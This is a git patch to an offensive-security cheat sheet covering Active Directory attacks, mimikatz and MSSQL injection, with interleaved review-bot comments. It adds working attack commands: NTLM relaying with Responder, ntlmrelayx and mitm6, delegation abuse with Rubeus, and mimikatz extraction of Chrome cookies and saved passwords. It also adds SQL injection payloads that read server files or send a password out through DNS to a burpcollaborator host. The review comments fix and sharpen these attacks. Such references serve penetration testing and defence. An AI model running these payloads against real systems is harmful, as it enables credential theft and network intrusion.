From 0443babe35ac771517bb8e0091b8b9f8a8cd02c0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 25 Mar 2021 18:25:02 +0100 Subject: [PATCH] Relay + MSSQL Read File --- .../Active Directory Attack.md | 63 +++++++++++++------ .../Windows - Mimikatz.md | 16 ++++- SQL Injection/MSSQL Injection.md | 18 +++++- 3 files changed, 76 insertions(+), 21 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 38337c2..df51c28 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -50,7 +50,7 @@ - [Using impacket](#using-impacket) - [Using Rubeus](#using-rubeus) - [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) - - [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) + - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4) - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6) @@ -1436,7 +1436,7 @@ Then crack the hash with `hashcat` hashcat -m 5600 -a 0 hash.txt crackstation.txt ``` -### NTLMv2 hashes relaying +### Man-in-the-Middle attacks & relaying NTLMv1 and NTLMv2 can be relayed to connect to another machine. 
@@ -1473,14 +1473,13 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with HTTP = Off # Turn this off ``` 2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. -3. Run `python Responder.py -I ` and `python MultiRelay.py -t -u ALL` -4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list. - ```powershell - ntlmrelayx.py -tf targets.txt - ``` +3. Run `python Responder.py -I ` +4. Use a relay tool such as `ntlmrelayx` or `MultiRelay` + - `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list. + - `python MultiRelay.py -t -u ALL` 5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. ```powershell - $ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support + $ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support [*] Servers started, waiting for connections Type help for list of commands ntlmrelayx> socks @@ -1489,12 +1488,18 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 - - $ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1 - $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth + + # You might need to select a target with "-t" + impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support + impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support + + # the socks proxy can then be used with your Impacket tools or CrackMapExec + $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1 + $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth + $ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" ``` -Mitigations: +**Mitigations**: * Disable LLMNR via group policy ```powershell 
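Review bot: Steps 3 and 4 of the rewritten list end in bare flags as rendered — `python Responder.py -I ` and `python MultiRelay.py -t -u ALL` — presumably because angle-bracket placeholders were swallowed by the renderer, so a reader gets no hint what value goes there. Use placeholders that survive markdown, e.g. `python Responder.py -I eth0` and `python MultiRelay.py -t 10.10.10.10 -u ALL`. It would also help to say in step 3 why the `HTTP = Off` / SMB-off edit shown above is required: Responder's own servers and the relay tool otherwise both try to own ports 80/445 and the relay never sees the authentication. The enclosing numbered list starts above the hunk.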
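Review bot: The SOCKS example mixes hosts — the `socks` table lists relayed sessions on 192.168.48.230, but the new `-t mssql://10.10.10.10` / `-t smb://10.10.10.10` lines and the proxied `impacket-mssqlclient DOMAIN/USER@10.10.10.10` and `crackmapexec mssql 10.10.10.10` commands target 10.10.10.10, so someone copying them will not hit a relayed session. Use one address and one account throughout, e.g. `$ proxychains impacket-mssqlclient contoso/normaluser1@192.168.48.230 -windows-auth`. It is also worth stating what the `-p ''` in the crackmapexec line implies: the proxied connection reuses an already-relayed session, so the DOMAIN/USER pair must match a row of the `socks` output and the password supplied is presumably not checked — confirm against the ntlmrelayx version in use.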
@@ -1510,15 +1515,21 @@ Mitigations: Since MS16-077 the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. ```powershell -cme smb $hosts --gen-relay-list relay.txt +crackmapexec smb $hosts --gen-relay-list relay.txt # DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 +# -d is the domain name that we filter our request on - the attacked domain +# -i is the interface we have mitm6 listen on for events mitm6 -i eth0 -d $domain # spoofing WPAD and relaying NTLM credentials -ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt -or -ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug +impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt +impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug + +# -ip is the interface you want the relay to run on +# -wh is for WPAD host, specifying your wpad file to serve +# -t is the target where you want to relay to. +impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2 ``` #### Drop the MIC @@ -1984,8 +1995,10 @@ $ Get-DomainComputer -TrustedToAuth | select -exp dnshostname # Find the service $ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo +``` -# Exploit with Impacket +#### Exploit with Impacket +```ps1 $ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10 Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation 
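Review bot: The new `impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2` line drops the `-6` flag that the two commands above it use; with mitm6 doing DHCPv6/DNS takeover the victims reach the attacker over IPv6, so without `-6` the listener bound with `-ip` on IPv4 will presumably never receive the WPAD requests — confirm, and add `-6` if so. The `-wh` comment is also misleading: `-wh` is the WPAD host, i.e. the address the generated proxy PAC points clients at (the attacker), not a file to serve; suggest `# -wh is the WPAD host: the attacker address the served PAC file points clients to`. Finally, a one-line caveat that relaying to LDAP/LDAPS is blocked when LDAP signing or channel binding is enforced on the DC would save readers a dead end, since that is the control this technique actually hinges on.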
@@ -1994,14 +2007,28 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator.ccache +``` -# Exploit with Rubeus +#### Exploit with Rubeus +```ps1 $ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:... $ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt $ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt $ dir \\dc.domain.com\c$ ``` +#### Impersonate a domain user on a resource + +Require: +* SYSTEM level privileges on a machine configured with constrained delegation + +```ps1 +PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null +PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator') +PS> $idToImpersonate.Impersonate() +PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name +PS> ls \\dc01.offense.local\c$ +``` ### Kerberos Resource Based Constrained Delegation diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index f2df2d5..d7baa58 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -11,6 +11,9 @@ * [Mimikatz - Skeleton key](#mimikatz---skeleton-key) * [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover) * [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) + * [Chrome Cookies & Credential](#chrome-cookies--credential) + * [Task Scheduled credentials](#task-scheduled-credentials) + * [Vault](#vault) * [Mimikatz - Commands list](#mimikatz---commands-list) * [Mimikatz - Powershell version](#mimikatz---powershell-version) * [References](#references) 
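Review bot: In the new "Impersonate a domain user on a resource" snippet the return value of `$idToImpersonate.Impersonate()` is discarded, so the impersonation cannot be reverted in-session; capture it and undo when done: `$ctx = $idToImpersonate.Impersonate()` … `$ctx.Undo()`. The `Require:` list is thinner than the section implies — the enumeration above filters on `-TrustedToAuth` and the Rubeus example delegates to `cifs/dc.domain.com` — so the prerequisites should read `Requires: SYSTEM on a machine configured for constrained delegation with protocol transition ("use any authentication protocol"), with the target SPN (e.g. cifs/dc01.offense.local) listed in its msDS-AllowedToDelegateTo`. `[Reflection.Assembly]::LoadWithPartialName` is deprecated; `Add-Type -AssemblyName System.IdentityModel` is the current form.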
@@ -178,8 +181,6 @@ net start sesshijack ``` - - ## Mimikatz - Credential Manager & DPAPI ```powershell @@ -196,6 +197,17 @@ $ mimikatz !sekurlsa::dpapi $ mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b ``` +### Chrome Cookies & Credential + +```powershell +# Saved Cookies +dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect +dpapi::chrome /in:"C:\Users\kbell\AppData\Local\Google\Chrome\User Data\Default\Cookies" /masterkey:9a6f199e3d2e698ce78fdeeefadc85c527c43b4e3c5518c54e95718842829b12912567ca0713c4bd0cf74743c81c1d32bbf10020c9d72d58c99e731814e4155b + +# Saved Credential in Chrome +dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect +``` + ### Task Scheduled credentials ```powershell diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 8e75bbd..e953694 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -14,6 +14,7 @@ * [MSSQL Blind Based](#mssql-blind-based) * [MSSQL Time Based](#mssql-time-based) * [MSSQL Stacked query](#mssql-stacked-query) +* [MSSQL Read file](#mssql-read-file) * [MSSQL Command execution](#mssql-command-execution) * [MSSQL Out of band](#mssql-out-of-band) * [MSSQL DNS exfiltration](#mssql-dns-exfiltration) @@ -147,6 +148,16 @@ Use a semi-colon ";" to add another query ProductID=1; DROP members-- ``` + +## MSSQL Read file + +**Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission. + +```sql +-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null +``` + + ## MSSQL Command execution ```sql 
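Review bot: The Chrome examples depend on the Chrome version and on how mimikatz is invoked, and the new section says nothing about either. Since Chrome 80 cookies and logins are encrypted with an AES key that is stored DPAPI-wrapped in `User Data\Local State`; recent mimikatz builds consume it via `/state:"%localappdata%\Google\Chrome\User Data\Local State"`, so that argument (or at least a sentence about it) belongs in the examples. `%localappdata%` is expanded by cmd.exe when the command is passed on the mimikatz command line but presumably not from the interactive `mimikatz #` prompt — confirm, and point readers at the full-path form the second example uses. The `/masterkey:9a6f…` value is the example user's (kbell) decrypted master key, not a constant, which should be stated next to it.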
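Review bot: The new "MSSQL Read file" section should say whose file system the path refers to: `OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB)` is resolved on the SQL Server host by the SQL Server service account, not on the web tier, so the readable files are those of the database host and its service identity. Two practical caveats belong next to the permission note: the `null` padding must match the injected SELECT's column count (the example assumes four columns), and binary files need `SINGLE_BLOB` rather than `SINGLE_CLOB`. A UNC path in the BULK argument (`\\attacker\share\x`) will presumably also make the service account authenticate outbound, which ties in with the relay section elsewhere in this patch — confirm before documenting.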
@@ -196,7 +207,12 @@ GO Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1 ```powershell -1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default)) +# Permissions: Requires VIEW SERVER STATE permission on the server. +1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null)) + +# Permissions: Requires the CONTROL SERVER permission. +1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default))) +1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default)) ```
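Review bot: The second new payload, `1 (select 1 where exists(select * from fn_get_audit_file(...)))`, is not a valid predicate on its own — unlike its two neighbours it lacks the `and`, so unless a different injection point is intended the statement errors before fn_get_audit_file is reached; it should read `1 and (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))` or simply `1 and exists(...)` like the others. The `# Permissions: Requires the CONTROL SERVER permission.` comment sits above both fn_get_audit_file and fn_trace_gettable, but to my knowledge fn_trace_gettable only needs ALTER TRACE — confirm and split the comment. Exfiltrating `pass` as a DNS label also silently fails for values with characters outside `[a-z0-9-]` or longer than 63 characters; a note to hex-encode (e.g. `master.dbo.fn_varbintohexstr(cast(pass as varbinary))`) and chunk long values would save readers a dead end.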